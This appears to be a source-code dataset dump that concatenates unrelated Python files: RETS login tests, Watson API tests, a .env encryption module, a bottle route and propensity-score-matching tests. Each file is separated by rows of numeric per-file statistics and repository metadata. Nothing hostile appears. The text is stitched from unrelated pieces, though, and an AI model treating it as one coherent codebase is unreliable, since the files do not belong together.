body=logout_contents, status=200)
with Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser', version='1.7.2') as s:
# I logged in here and will log out when leaving context
pass
resps.add(resps.POST, 'http://server.rets.com/rets/Login_no_host.ashx',
body=no_host_contents, status=200, headers={'RETS-Version': 'RETS/1.7.2'})
s1 = Session(login_url='http://server.rets.com/rets/Login_no_host.ashx', username='retsuser', version='1.5')
s1.login()
self.assertDictEqual(s1.capabilities, expected_capabilities2)
self.assertEqual(s.version, '1.7.2')
def test_login_with_action(self):
with open('tests/rets_responses/Login_with_Action.xml') as f:
action_login = ''.join(f.readlines())
with open('tests/rets_responses/Action.xml') as f:
action_response = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login_with_Action.ashx',
body=action_login, status=200)
resps.add(resps.GET, 'http://server.rets.com/rets/Action.ashx',
body=action_response, status=200)
s2 = Session(login_url='http://server.rets.com/rets/Login_with_Action.ashx', username='retsuser',
version='1.5')
s2.login()
self.assertIn(u'Action', list(s2.capabilities.keys()))
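# A minimal sketch of the `responses` pattern the tests above lean on: every HTTP
# request made inside a RequestsMock context must match a registered endpoint,
# and by default leftover or unmatched registrations fail the test. The URL and
# body below are placeholders, not part of the rets fixtures.
import requests
import responses

with responses.RequestsMock() as resps:
    resps.add(resps.GET, 'http://example.com/ping', body='pong', status=200)
    assert requests.get('http://example.com/ping').text == 'pong'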
| 46.535545
| 120
| 0.611977
| 2,260
| 19,638
| 5.198673
| 0.094248
| 0.04511
| 0.063154
| 0.076687
| 0.82807
| 0.791727
| 0.736403
| 0.730871
| 0.702017
| 0.673589
| 0
| 0.023437
| 0.254761
| 19,638
| 421
| 121
| 46.646081
| 0.779365
| 0.008097
| 0
| 0.529968
| 0
| 0
| 0.265455
| 0.094989
| 0
| 0
| 0
| 0
| 0.116719
| 1
| 0.082019
| false
| 0.006309
| 0.012618
| 0
| 0.104101
| 0.003155
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
69a319ad6b6c6f4cea8b2535a255071544000e23
| 110
|
py
|
Python
|
django_presentation/forms/fields/__init__.py
|
adamkerz/django-presentation
|
1e812faa5f682e021fa6580509d8d324cfcc119c
|
[
"BSD-3-Clause"
] | null | null | null |
django_presentation/forms/fields/__init__.py
|
adamkerz/django-presentation
|
1e812faa5f682e021fa6580509d8d324cfcc119c
|
[
"BSD-3-Clause"
] | null | null | null |
django_presentation/forms/fields/__init__.py
|
adamkerz/django-presentation
|
1e812faa5f682e021fa6580509d8d324cfcc119c
|
[
"BSD-3-Clause"
] | null | null | null |
from .GroupedModelChoiceField import GroupedModelChoiceField
from .TypedChoiceField import TypedChoiceField
| 36.666667
| 61
| 0.890909
| 8
| 110
| 12.25
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 110
| 2
| 62
| 55
| 0.98
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
69b1ec4426e52180e95f3ba65c412433f6571439
| 62
|
py
|
Python
|
package_eg_test1.py
|
PhyuAye/python_exercises
|
ea22acd4ad3a099fbaf2c70913db6b361b2c9c45
|
[
"MIT"
] | null | null | null |
package_eg_test1.py
|
PhyuAye/python_exercises
|
ea22acd4ad3a099fbaf2c70913db6b361b2c9c45
|
[
"MIT"
] | null | null | null |
package_eg_test1.py
|
PhyuAye/python_exercises
|
ea22acd4ad3a099fbaf2c70913db6b361b2c9c45
|
[
"MIT"
] | null | null | null |
import package_example1.ex41
package_example1.ex41.convert()
| 15.5
| 31
| 0.854839
| 8
| 62
| 6.375
| 0.625
| 0.588235
| 0.745098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.064516
| 62
| 3
| 32
| 20.666667
| 0.775862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
69be3a8152c1fc429f338e7135134177c4e25733
| 122
|
py
|
Python
|
src/the_tale/the_tale/game/balance/context_processors.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | 1
|
2020-04-02T11:51:20.000Z
|
2020-04-02T11:51:20.000Z
|
src/the_tale/the_tale/game/balance/context_processors.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
src/the_tale/the_tale/game/balance/context_processors.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
import smart_imports
smart_imports.all()
def balance(request):
return {'c': constants,
'f': formulas}
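# A hedged sketch of how a context processor like `balance` above is typically
# registered in Django settings. The dotted path matches this module's location
# in the repository, but the surrounding TEMPLATES block is illustrative rather
# than copied from the project's settings.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.request',
                # exposes {{ c.* }} and {{ f.* }} in every template
                'the_tale.game.balance.context_processors.balance',
            ],
        },
    },
]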
| 12.2
| 27
| 0.631148
| 14
| 122
| 5.357143
| 0.857143
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.245902
| 122
| 9
| 28
| 13.555556
| 0.815217
| 0
| 0
| 0
| 0
| 0
| 0.016529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
69bece59b33a658fd613e575349f904fb66d7cf6
| 4,211
|
py
|
Python
|
test/test_alchemy_language_v1.py
|
trishamoyer/python-sdk
|
d13578971d26e439f1c2ef6bb51e686657110fcb
|
[
"Apache-2.0"
] | 1
|
2021-02-02T13:39:02.000Z
|
2021-02-02T13:39:02.000Z
|
test/test_alchemy_language_v1.py
|
ricardyn/python-sdk
|
9a4ee5b630c325bb551de0ceffeeceda40c704f7
|
[
"Apache-2.0"
] | null | null | null |
test/test_alchemy_language_v1.py
|
ricardyn/python-sdk
|
9a4ee5b630c325bb551de0ceffeeceda40c704f7
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
import watson_developer_cloud
import responses
import pytest
class TestAlchemyLanguageV1(TestCase):
def test_api_key(self):
default_url = 'https://gateway-a.watsonplatform.net/calls'
inited = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
assert inited.api_key == 'boguskey'
assert inited.url == default_url
inited.set_url(url="http://google.com")
assert inited.url == "http://google.com"
# with pytest.raises(watson_developer_cloud.WatsonException):
# watson_developer_cloud.AlchemyLanguageV1()
# with pytest.raises(watson_developer_cloud.WatsonException):
# watson_developer_cloud.AlchemyLanguageV1(api_key='YOUR API KEY')
def test_unpack_id(self):
testdict = {'one': 10}
assert watson_developer_cloud.AlchemyLanguageV1.unpack_id(testdict, 'one') == 10
assert watson_developer_cloud.AlchemyLanguageV1.unpack_id(testdict, 'two') == testdict
@responses.activate
def test_author(self):
url = 'https://gateway-a.watsonplatform.net'
default_url = 'https://gateway-a.watsonplatform.net/calls'
responses.add(responses.POST, '{0}/html/HTMLGetAuthor'.format(url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/url/URLGetAuthor'.format(url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/html/HTMLGetAuthor'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/url/URLGetAuthor'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
alang = watson_developer_cloud.AlchemyLanguageV1(url=url, api_key='boguskey', x_watson_learning_opt_out=True)
alang.author(html="I'm html")
alang.author(url="http://google.com")
with pytest.raises(watson_developer_cloud.WatsonInvalidArgument):
alang.author()
alang = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
alang.author(html="I'm html")
alang.author(url="http://google.com")
assert len(responses.calls) == 4
@responses.activate
def test_auth_exception(self):
default_url = 'https://gateway-a.watsonplatform.net/calls'
responses.add(responses.POST, '{0}/url/URLGetAuthor'.format(default_url),
body='{"bogus": "response"}', status=401,
content_type='application/json')
alang = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
with pytest.raises(watson_developer_cloud.WatsonException):
alang.author(url="http://google.com")
assert len(responses.calls) == 1
@responses.activate
def test_authors(self):
default_url = 'https://gateway-a.watsonplatform.net/calls'
responses.add(responses.POST, '{0}/url/URLGetAuthors'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/html/HTMLGetAuthors'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
alang = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
alang.authors(url="http://google.com")
alang.authors(html="<h1>Author</h1>")
assert len(responses.calls) == 2
| 48.965116
| 117
| 0.616006
| 443
| 4,211
| 5.659142
| 0.180587
| 0.083765
| 0.111687
| 0.132828
| 0.806143
| 0.797367
| 0.784204
| 0.763861
| 0.751895
| 0.732349
| 0
| 0.015098
| 0.260746
| 4,211
| 85
| 118
| 49.541176
| 0.790235
| 0.055806
| 0
| 0.5
| 0
| 0
| 0.201712
| 0.022161
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.073529
| false
| 0
| 0.058824
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
69dde79a841bd695c013122f58f94992058d8754
| 59
|
py
|
Python
|
hooks/charmhelpers/core/services/__init__.py
|
projectcalico/charm-bird
|
3224e887329c527f6bed2520346e66fb4e795fe8
|
[
"Apache-2.0"
] | null | null | null |
hooks/charmhelpers/core/services/__init__.py
|
projectcalico/charm-bird
|
3224e887329c527f6bed2520346e66fb4e795fe8
|
[
"Apache-2.0"
] | null | null | null |
hooks/charmhelpers/core/services/__init__.py
|
projectcalico/charm-bird
|
3224e887329c527f6bed2520346e66fb4e795fe8
|
[
"Apache-2.0"
] | 1
|
2022-03-16T16:12:32.000Z
|
2022-03-16T16:12:32.000Z
|
from .base import * # NOQA
from .helpers import * # NOQA
| 19.666667
| 30
| 0.661017
| 8
| 59
| 4.875
| 0.625
| 0.512821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.237288
| 59
| 2
| 31
| 29.5
| 0.866667
| 0.152542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e09e1c83e073f6265e296047962a0cd54a61a89
| 10,628
|
py
|
Python
|
src/edotenv/core.py
|
rrwen/python-edotenv
|
3292d100aab53a53d526dddf5b495b3f31609d8b
|
[
"MIT"
] | 1
|
2022-03-12T12:29:30.000Z
|
2022-03-12T12:29:30.000Z
|
src/edotenv/core.py
|
rrwen/python-edotenv
|
3292d100aab53a53d526dddf5b495b3f31609d8b
|
[
"MIT"
] | 1
|
2022-03-12T12:37:43.000Z
|
2022-03-12T12:37:43.000Z
|
src/edotenv/core.py
|
rrwen/python-edotenv
|
3292d100aab53a53d526dddf5b495b3f31609d8b
|
[
"MIT"
] | null | null | null |
import os
from dotenv import load_dotenv, dotenv_values
from io import StringIO
from .encryption import *
def dotenv_to_edotenv(dotenv_path='.env', edotenv_path='.env', key_path=None, *args, **kwargs):
"""
Encrypt a .env file.
Parameters
----------
dotenv_path : str
The path of the .env file.
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file.
* If the file does not exist, then a key file will be automatically generated
* If ``None``, defaults to a file inside the package's directory
*args, **kwargs
Additional arguments passed to `dotenv.dotenv_values <https://saurabh-kumar.com/python-dotenv/reference/dotenv/main/#dotenv_values>`_.
Example
-------
.. jupyter-execute::
import tempfile
import os
from edotenv import dotenv_to_edotenv, load_edotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Create a .env file with vars TESTINGA and TESTINGB
dotenv_path = f'{folder}/.env'
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write('TESTINGA=testinga123\\nTESTINGB=testingb123')
# Check if the vars exist
print('TESTINGA in env (not loaded): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (not loaded): ' + str('TESTINGB' in os.environ))
# Encrypt the .env file
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
dotenv_to_edotenv(dotenv_path, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if vars exist again
print('TESTINGA value (loaded): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (loaded): ' + str(os.environ['TESTINGB']))
"""
# Get .env file data
values = dotenv_values(dotenv_path, *args, **kwargs)
data = '\n'.join([v + '=' + values[v] for v in values])
# Get the key from the file, or generate a key file if it does not exist
key = read_key_file(key_path)
# Save encrypted .env file
edata = encrypt(data, key)
with open(edotenv_path, 'wb') as edotenv_file:
edotenv_file.write(edata)
def edotenv_to_dotenv(dotenv_path='.env', edotenv_path='.env', key_path=None, *args, **kwargs):
"""
Decrypt a .env file.
Parameters
----------
dotenv_path : str
The path of the .env file.
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file.
* If the file does not exist, then a key file will be automatically generated
* If ``None``, defaults to a file inside the package's directory
Example
-------
.. jupyter-execute::
import tempfile
import os
from dotenv import load_dotenv
from edotenv import dotenv_to_edotenv, load_edotenv, edotenv_to_dotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Create a .env file with vars TESTINGA and TESTINGB
dotenv_path = f'{folder}/.env'
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write('TESTINGA=testinga123\\nTESTINGB=testingb123')
# Check if the vars exist
print('TESTINGA in env (not loaded): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (not loaded): ' + str('TESTINGB' in os.environ))
# Encrypt the .env file
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
dotenv_to_edotenv(dotenv_path, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if vars exist again
print('TESTINGA value (loaded): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (loaded): ' + str(os.environ['TESTINGB']))
# Decrypt the .env file
dotenv_path = f'{folder}/.env.decrypted'
edotenv_to_dotenv(dotenv_path, edotenv_path, key_path)
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Check if the vars exist after removal for testing decrypted file
print('TESTINGA in env (before loading decrypt): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (before loading decrypt): ' + str('TESTINGB' in os.environ))
# Load the decrypted .env file
load_dotenv(dotenv_path)
# Check if vars exist again after loading decrypted file
print('TESTINGA value (after loading decrypt): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (after loading decrypt): ' + str(os.environ['TESTINGB']))
"""
# Read encrypted .env file
with open(edotenv_path, 'rb') as edotenv_file:
edata = edotenv_file.read()
# Get the key from the file, or generate a key file if it does not exist
key = read_key_file(key_path)
# Decrypt env vars and save to .env file
data = decrypt(edata, key)
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write(data)
def load_edotenv(edotenv_path='.env', key_path=None, *args, **kwargs):
"""
Load environment variables from an encrypted .env file.
Parameters
----------
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file. If ``None``, defaults to a file inside the package's directory.
*args, **kwargs
Additional arguments passed to `dotenv.load_dotenv <https://saurabh-kumar.com/python-dotenv/reference/dotenv/main/#load_dotenv>`_.
Example
-------
.. jupyter-execute::
import tempfile
import os
from edotenv import dotenv_to_edotenv, load_edotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Create a .env file with vars TESTINGA and TESTINGB
dotenv_path = f'{folder}/.env'
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write('TESTINGA=testinga123\\nTESTINGB=testingb123')
# Check if the vars exist
print('TESTINGA in env (not loaded): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (not loaded): ' + str('TESTINGB' in os.environ))
# Encrypt the .env file
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
dotenv_to_edotenv(dotenv_path, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if vars exist again
print('TESTINGA value (loaded): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (loaded): ' + str(os.environ['TESTINGB']))
"""
# Read encrypted .env file
with open(edotenv_path, 'rb') as edotenv_file:
edata = edotenv_file.read()
# Get the key from the file, or generate a key file if it does not exist
key = read_key_file(key_path, create_if_not_exists=False)
# Decrypt env vars and load them
data = decrypt(edata, key)
stream = StringIO(data)
load_dotenv(stream=stream, *args, **kwargs)
def save_edotenv(vars, edotenv_path='.env', key_path=None):
"""
Save environment variables to an encrypted .env file.
Parameters
----------
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file.
* If the file does not exist, then a key file will be automatically generated
* If ``None``, defaults to a file inside the package's directory
vars : str or list
A list of the environment variable names to save into the encrypted .env file.
Example
-------
.. jupyter-execute::
import tempfile
import os
from edotenv import save_edotenv, load_edotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Set env vars TESTINGA and TESTINGB
os.environ['TESTINGA'] = 'testinga123'
os.environ['TESTINGB'] = 'testingb123'
# Check the values of the vars
print('TESTINGA value (before save): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (before save): ' + str(os.environ['TESTINGB']))
# Save an encrypted .env file of the vars
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
vars = ['TESTINGA', 'TESTINGB']
save_edotenv(vars, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if the vars loaded correctly from encrypted .env file
print('TESTINGA value (after save): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (after save): ' + str(os.environ['TESTINGB']))
"""
# Get the key from the file, or generate a key file if it does not exist
key = read_key_file(key_path)
# Get and encrypt env vars
vars = vars if isinstance(vars, list) else [vars]
data = '\n'.join([v + '=' + str(os.environ[v]) for v in vars])
edata = encrypt(data, key)
# Save encrypted .env file
with open(edotenv_path, 'wb') as edotenv_file:
edotenv_file.write(edata)
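# A hedged sketch of the helpers imported from `.encryption` at the top of this
# module; that file is not shown here, so the Fernet-based implementation below
# is an assumption chosen to match the str-in/bytes-out usage in core.py. The
# package-default path used when key_path is None is reduced to a stand-in.
import os
from cryptography.fernet import Fernet

def read_key_file(key_path, create_if_not_exists=True):
    """Load the key, generating a key file on first use when allowed."""
    key_path = key_path or '.env.key'  # stand-in for the package-default path
    if os.path.exists(key_path):
        with open(key_path, 'rb') as key_file:
            return key_file.read()
    if not create_if_not_exists:
        raise FileNotFoundError('No key file at {0}'.format(key_path))
    key = Fernet.generate_key()
    with open(key_path, 'wb') as key_file:
        key_file.write(key)
    return key

def encrypt(data, key):
    # str in, encrypted bytes out, matching the 'wb' writes in core.py
    return Fernet(key).encrypt(data.encode('utf-8'))

def decrypt(edata, key):
    # encrypted bytes in, str out, matching the StringIO/'w' usage in core.py
    return Fernet(key).decrypt(edata).decode('utf-8')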
| 35.66443
| 142
| 0.601336
| 1,342
| 10,628
| 4.658718
| 0.085693
| 0.0619
| 0.03167
| 0.039507
| 0.84453
| 0.817818
| 0.795905
| 0.778311
| 0.737204
| 0.71881
| 0
| 0.00321
| 0.296575
| 10,628
| 298
| 143
| 35.66443
| 0.833066
| 0.780203
| 0
| 0.46875
| 0
| 0
| 0.024778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
38baa8a87a575ca2852236139d9dd9eb0d35391a
| 185
|
py
|
Python
|
routes/index.py
|
Murtagy/Pyfile
|
10ea0bf1f16c1fb83548aaf3b8b1cab3a23e757a
|
[
"MIT"
] | null | null | null |
routes/index.py
|
Murtagy/Pyfile
|
10ea0bf1f16c1fb83548aaf3b8b1cab3a23e757a
|
[
"MIT"
] | null | null | null |
routes/index.py
|
Murtagy/Pyfile
|
10ea0bf1f16c1fb83548aaf3b8b1cab3a23e757a
|
[
"MIT"
] | null | null | null |
from main.app import app
from .security import check_login
import bottle
# BASIC FILE MANAGEMENT
@app.route('/')
@check_login
def index():
return bottle.template('main', path='.')
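# A hedged sketch of what the `check_login` decorator imported above might look
# like in bottle; the real one lives in .security and is not shown here, so the
# cookie name and redirect target are illustrative assumptions.
import functools
import bottle

def check_login(view):
    @functools.wraps(view)
    def wrapper(*args, **kwargs):
        if not bottle.request.get_cookie('session'):  # assumed cookie name
            return bottle.redirect('/login')          # assumed login route
        return view(*args, **kwargs)
    return wrapper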
| 20.555556
| 44
| 0.72973
| 26
| 185
| 5.115385
| 0.653846
| 0.150376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140541
| 185
| 9
| 44
| 20.555556
| 0.836478
| 0.113514
| 0
| 0
| 0
| 0
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
38db39729061d8be28852a85238397c67d792ed8
| 28
|
py
|
Python
|
src/herbpy/__init__.py
|
personalrobotics/herbpy
|
ab48e9190b061759b31bc9c879a7f96a51d975f5
|
[
"BSD-3-Clause"
] | 4
|
2017-03-04T06:18:21.000Z
|
2019-01-04T08:03:41.000Z
|
src/herbpy/__init__.py
|
personalrobotics/herbpy
|
ab48e9190b061759b31bc9c879a7f96a51d975f5
|
[
"BSD-3-Clause"
] | 87
|
2015-01-30T03:50:35.000Z
|
2017-02-20T18:55:42.000Z
|
src/herbpy/__init__.py
|
personalrobotics/herbpy
|
ab48e9190b061759b31bc9c879a7f96a51d975f5
|
[
"BSD-3-Clause"
] | 10
|
2015-07-29T13:13:05.000Z
|
2019-02-13T22:11:24.000Z
|
from .herb import initialize
| 14
| 27
| 0.857143
| 4
| 28
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c7f7fba59521e3c4677259d18fa1fb6099fb793b
| 12,270
|
py
|
Python
|
PropensityScoreMatching/tests/tests_matchclass.py
|
aegorenkov/PropensityScoreMatching
|
ad7b6954916a07b0f863f394787d2702ebad4b5f
|
[
"MIT"
] | 2
|
2018-06-05T15:17:23.000Z
|
2021-01-08T08:55:43.000Z
|
PropensityScoreMatching/tests/tests_matchclass.py
|
aegorenkov/PropensityScoreMatching
|
ad7b6954916a07b0f863f394787d2702ebad4b5f
|
[
"MIT"
] | null | null | null |
PropensityScoreMatching/tests/tests_matchclass.py
|
aegorenkov/PropensityScoreMatching
|
ad7b6954916a07b0f863f394787d2702ebad4b5f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon May 18 14:30:15 2015
@author: Alexander
"""
import unittest
import PropensityScoreMatching as PSM
import pandas as pd
import numpy as np
import os
LOCAL_DIR = os.path.dirname(__file__)
FILENAMES = [os.path.join('results', 'nsw_all_random1_pscoresimple.csv'),
os.path.join('results', 'nsw_all_random2_pscoresimple.csv'),
os.path.join('results', 'nsw_all_random3_pscoresimple.csv')]
FILEPATHS = [os.path.join(LOCAL_DIR, name) for name in FILENAMES]
DATASET1 = pd.read_csv(FILEPATHS[0])
DATASET2 = pd.read_csv(FILEPATHS[1])
DATASET3 = pd.read_csv(FILEPATHS[2])
class MatchClass(unittest.TestCase):
#We don't define setUp because we will need to change parameters of the
#match instance
def test_match_can_initialize(self):
match = PSM.Match()
self.assertEqual(match.match_type, 'neighbor')
def test_set1_idlist_is_same_length_as_data(self):
testdata = DATASET1.sort_values(by="_id")
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
self.assertTrue(len(id_list) == len(DATASET1["_n1"]),
msg="List of matches has incorrect length")
def test_set1_matches_in_order(self):
testdata = DATASET1
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
test_list, true_list = testdata["_id"][id_list], testdata["_n1"]
#Raise AssertionError if id_list cannot match the order of id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set2_matches_in_order(self):
testdata = DATASET2
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
test_list, true_list = testdata["_id"][id_list], testdata["_n1"]
#Raise AssertionError if id_list cannot match the order of id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set3_matches_in_order(self):
testdata = DATASET3
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
test_list, true_list = testdata["_id"][id_list], testdata["_n1"]
#Raise AssertionError if id_list cannot match the order of id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
class PropensityScoreMatchingClass(unittest.TestCase):
#We don't define setUp because we will need to change parameters of the
#psm instance
@staticmethod
def load_data(dataset, key_range):
treated = dataset['Treated']
names = dataset.keys()[key_range]
design_matrix = dataset[names]
design_matrix['Intercept'] = 1
return (treated, design_matrix)
def test_psm_can_initialize(self):
psm = PSM.StatisticalMatching()
self.assertEqual(psm.model, 'logit')
def test_set1_pscores_should_equal_data_pscores(self):
